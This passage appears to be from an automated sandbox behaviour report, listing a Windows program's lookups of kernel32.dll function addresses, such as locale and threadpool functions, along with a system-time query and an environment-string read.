| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7713ca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x770f0b8c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x771afde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77141e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74d44761 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74d3cd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74d4424f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74d446b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74d56676 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74d44751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74d565f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74d447c1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74d447e1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74d447f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74cdeee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-05 07:22:14 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
